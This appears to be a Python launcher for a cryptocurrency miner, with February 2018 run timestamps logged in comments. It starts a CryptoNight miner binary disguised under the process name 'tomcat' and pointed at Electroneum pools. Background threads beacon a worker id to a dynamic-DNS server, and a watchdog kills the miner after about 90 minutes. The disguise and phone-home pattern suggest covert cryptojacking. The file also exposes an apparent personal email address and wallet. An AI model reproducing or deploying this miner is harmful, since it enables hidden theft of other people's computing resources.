import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:14:01.362065
#2018-02-17 16:01:03.563415
#2018-02-17 17:48:05.040581
#2018-02-17 19:36:05.147360
#2018-02-17 21:24:05.883954
#2018-02-17 23:08:01.467088
#2018-02-18 00:55:06.804081
#2018-02-18 02:43:04.355264
#2018-02-18 04:32:05.106856
#2018-02-18 06:23:04.728377
#2018-02-18 08:11:06.772022
#2018-02-18 09:58:06.551793
#2018-02-18 11:45:04.640798
#2018-02-18 13:30:08.478921
#2018-02-18 15:20:04.892539
#2018-02-18 17:09:01.542494
#2018-02-18 18:56:05.647389
#2018-02-18 20:43:07.387986
#2018-02-18 22:29:05.053504
#2018-02-19 00:18:02.209606
#2018-02-19 02:04:06.651180
#2018-02-19 03:50:09.181019
#2018-02-19 05:36:06.431742
#2018-02-19 07:25:05.904050
#2018-02-19 09:15:05.528806
#2018-02-19 11:04:03.215381
#2018-02-19 12:51:01.832538
#2018-02-19 14:39:05.169371
#2018-02-19 16:26:09.281212
#2018-02-19 18:14:07.964336
#2018-02-19 20:00:10.752491
#2018-02-19 21:48:08.371862
#2018-02-19 23:34:08.311698
#2018-02-20 01:20:03.697540
#2018-02-20 03:10:07.840255
#2018-02-20 04:56:07.517677
#2018-02-20 06:40:09.270506
#2018-02-20 08:25:05.291958
#2018-02-20 08:26:06.083818
#2018-02-20 10:10:06.100742
#2018-02-20 11:42:09.621234
#2018-02-20 13:17:10.091552
#2018-02-20 14:47:06.714933
#2018-02-20 16:23:06.989857
#2018-02-20 17:58:12.968932
#2018-02-20 19:39:01.881578
#2018-02-20 21:11:08.631634
#2018-02-20 22:42:05.639274
#2018-02-21 00:12:02.006820
#2018-02-21 01:49:01.780787
#2018-02-21 03:26:05.888307
#2018-02-21 04:59:06.149002
#2018-02-21 06:35:06.518820
#2018-02-21 08:12:06.119114
#2018-02-21 09:47:01.434659
#2018-02-21 11:23:06.246816
#2018-02-21 12:54:01.475410
#2018-02-21 14:29:07.140335
#2018-02-21 16:01:06.562209
#2018-02-21 17:39:01.748898
#2018-02-21 19:10:08.871085
#2018-02-21 20:44:08.631922
#2018-02-21 22:19:08.496096
#2018-02-21 23:56:06.428497
#2018-02-22 01:32:01.252462
#2018-02-22 03:04:06.693191
#2018-02-22 04:35:06.075476
#2018-02-22 06:08:05.730227
#2018-02-22 07:43:02.063997
#2018-02-22 09:17:05.937026
#2018-02-22 10:50:07.902245
#2018-02-22 12:20:09.755370
#2018-02-22 13:53:01.695248
#2018-02-22 15:29:09.270695
#2018-02-22 16:59:06.674127
#2018-02-22 18:38:09.716262
#2018-02-22 20:14:05.809050
#2018-02-22 21:44:09.715000
#2018-02-22 23:18:01.943781
#2018-02-23 00:50:06.689127
#2018-02-23 02:24:06.268078
#2018-02-23 03:55:07.185926
#2018-02-23 05:35:07.788558
#2018-02-23 07:19:06.578455
#2018-02-23 09:23:06.237045
#2018-02-23 11:30:09.906298
#2018-02-23 13:21:01.481135
#2018-02-23 15:07:09.071801
#2018-02-23 16:56:08.929936
#2018-02-23 18:34:04.841718
#2018-02-23 20:22:04.166932
#2018-02-23 22:08:08.291849
#2018-02-23 23:57:01.540577
#2018-02-24 01:48:07.329101
#2018-02-24 03:40:09.213521
#2018-02-24 05:24:05.156722
#2018-02-24 07:12:03.555123
#2018-02-24 09:00:06.781008
#2018-02-24 10:41:07.538991
#2018-02-24 12:32:07.437259
#2018-02-24 14:21:05.523261
#2018-02-24 16:08:05.923049
#2018-02-24 17:59:05.058628
#2018-02-24 19:47:05.823964
#2018-02-24 21:32:07.617019
#2018-02-25 00:18:06.514777
#2018-02-25 04:22:05.441966
#2018-02-25 07:54:03.504179